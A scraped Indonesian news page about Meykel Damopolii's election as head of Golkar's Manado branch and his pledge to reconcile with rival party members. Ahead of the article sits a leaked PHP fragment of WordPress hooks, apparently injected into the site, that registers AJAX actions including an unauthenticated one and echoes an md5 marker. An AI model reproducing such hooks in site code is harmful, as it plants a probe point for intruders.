function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Kembalikan Kejayaan Golkar Manado, Damopolii Siap Rangkul Libin Cs – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

MANADO · 28 Agu 2020 17:01 WIB ·

Kembalikan Kejayaan Golkar Manado, Damopolii Siap Rangkul Libin Cs


					Ketua terpilih DPD II Partai Golkar Manado, Meykel Damopolii. Perbesar

Ketua terpilih DPD II Partai Golkar Manado, Meykel Damopolii.

Ketua terpilih DPD II Partai Golkar Manado, Meykel Damopolii.

 

MANADO – Meykel Damopolii memberikan pernyataan setelah terpilih aklamasi Ketua DPD II Partai Golkar Kota Manado, lewat Musyarawah Daerah (Musda) yang berlangsung di Hotel Four Point Manado, Kamis (27/8/2020).

Kepada wartawan, Meykel Damopolii mengaku akan merangkul Lily Binti Cs yang pada saat Musda melakukan protes terhadap panitia pelaksana terkait hak pilih dan jabatan di struktur partai.

“Bagi saya riak-riuk dalam musda kemarin hal yang biasa. Inilah Golkar. Saya tidak ingin terpancing. Musda bukan untuk memecah belah, namun justru untuk menyamakan persepsi demi kemajuan Partai Golkar,” kata Damopolii kepada wartawan di Lantai III Four Point Hotel, Jumat (28/08/2020).

Bagi dia, saatnya kini semua terkonsentrasi untuk membangun serta mengembalikan kejayaan Golkar di Kota Manado, terlebih dalam menyambut Pilkada Serentak 2020.

“Saya tetap akan menjalin komunikasi dengan Ci Bos serta teman-teman yang mungkin tidak searah dalam musda kemarin. Intinya musda sudah selesai, kini saatnya kader dan simpatisan diberdayakan dalam menghadapi pilkada,” tegas Damopolii yang mengaku biasa menyebut Libin dengan sebutan Ci Bos.

Golkar Manado sendiri menurutnya akan berkonsentrasi dalam menatap Pilkada Manado dan Pilgub Sulut yang sudah di depan mata.

“Kita wajib mendukung siapapun yang akan dicalonkan Golkar untuk Manado serta mendukung Ibu CEP sebagai Calon Gubernur Sulut,” tukas Teba sapaan akrabnya. (AMan)

Artikel ini telah dibaca 15 kali

badge-check

Penulis

Baca Lainnya

Pemkot Manado Rolling Jabatan Kepsek dan Pengawas, Wawali Sualang: Tetap Fokus Bekerja

20 Maret 2024 - 15:30 WIB

Pemkot Manado Rolling Jabatan Pegawai Eselon III dan IV

5 Maret 2024 - 17:23 WIB

Dapil Sario – Malalayang Membara, Peluang Rebut 6 Kursi DPRD Manado

16 Februari 2024 - 12:51 WIB

Terkait Video Viral Pemindahan Kotak Suara ke Graha Gubernuran, Ini Kata KPU Manado

16 Februari 2024 - 11:31 WIB

Data Real Count 47 Kelurahan Masuk, Bang Ai Unggul Jauh atas Royke Anter

16 Februari 2024 - 01:06 WIB

Bawaslu Manado Diduga Kebablasan Awasi Kampanye Prabowo di Lapangan Koni

7 Februari 2024 - 22:13 WIB

Trending di MANADO